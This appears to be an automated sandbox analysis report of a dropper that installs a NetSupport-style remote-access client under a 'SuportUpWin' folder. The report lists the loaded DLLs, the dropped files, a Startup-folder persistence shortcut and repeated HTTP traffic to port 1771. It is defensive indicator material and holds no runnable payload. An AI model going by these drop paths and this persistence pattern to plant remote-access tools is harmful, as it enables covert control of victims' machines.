Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: autorunins.ini.lnk.0.dr

LNK file: ..\..\..\..\..\SuportUpWin\client32.exe

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File written: C:\Users\user\AppData\Roaming\SuportUpWin\client32.ini

Jump to behavior

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: hkpqXovZtS.exe

Static file information: File size 3338375 > 1048576

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File opened: C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dll

Jump to behavior

Source: hkpqXovZtS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000B.00000002.1372400954.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.0.dr
Source:	Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: hkpqXovZtS.exe
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000003.00000002.3711306367.0000000070222000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000B.00000002.1372539158.0000000070222000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000003.00000002.3711407321.0000000070235000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000B.00000002.1372612091.0000000070235000.00000002.00000001.01000000.00000009.sdmp, pcicapi.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1250\1250\client32\release_unicode\client32.pdb source: client32.exe, 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000003.00000000.1266608605.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000002.1371512576.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

Code function: 0_2_0040CA7B LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040CA7B

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File created: C:\Users\user\AppData\Roaming\__tmp_rar_sfx_access_check_6140921

Jump to behavior

Source: PCICL32.DLL.0.dr

Static PE information: section name: .hhshare

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_004548AB pushad ; iretd	0_2_004548C9
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00464B59 push edx; ret	0_2_00464B5A
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0041EDA1 push ecx; ret	0_2_0041EDB4
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00465270 push edi; iretd	0_2_00465271
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0044F394 push ds; ret	0_2_0044F447
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_0044F421 push ds; ret	0_2_0044F447
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00419784 push eax; ret	0_2_004197A2
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_00467D2C push ds; iretd	0_2_00467D45
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	Code function: 0_2_02295A15 pushad ; ret	0_2_02295A18
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1116FF15 push ecx; ret	3_2_1116FF28
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_1116AE09 push ecx; ret	3_2_1116AE1C
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEE2D80 push eax; ret	3_2_6CEE2D9E
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CEF0995 push ecx; ret	3_2_6CEF09A8
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF0A6AA push EF3FEFD4h; iretd	3_2_6CF0A6B1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 3_2_6CF09CD8 pushad ; iretd	3_2_6CF09CE6
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1116FF15 push ecx; ret	11_2_1116FF28
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_1116AE09 push ecx; ret	11_2_1116AE1C
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEE2D80 push eax; ret	11_2_6CEE2D9E
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEF0995 push ecx; ret	11_2_6CEF09A8
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF0A6AA push EF3FEFD4h; iretd	11_2_6CF0A6B1
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CF09CD8 pushad ; iretd	11_2_6CF09CE6
Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Code function: 11_2_6CEFBF60 push ecx; ret	11_2_6CEFBF73

Source: hkpqXovZtS.exe	Static PE information: section name: .text entropy: 7.220223726792702
Source: msvcr100.dll.0.dr	Static PE information: section name: .text entropy: 6.909044922675825

Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File created: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File created: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File created: C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File created: C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File created: C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File created: C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File created: C:\Users\user\AppData\Roaming\SuportUpWin\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\hkpqXovZtS.exe	File created: C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dll	Jump to dropped file

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autorunins.ini.lnk

Jump to behavior

Source: C:\Users\user\Desktop\hkpqXovZtS.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autorunins.ini.lnk

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

3_2_11128B10

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 1771
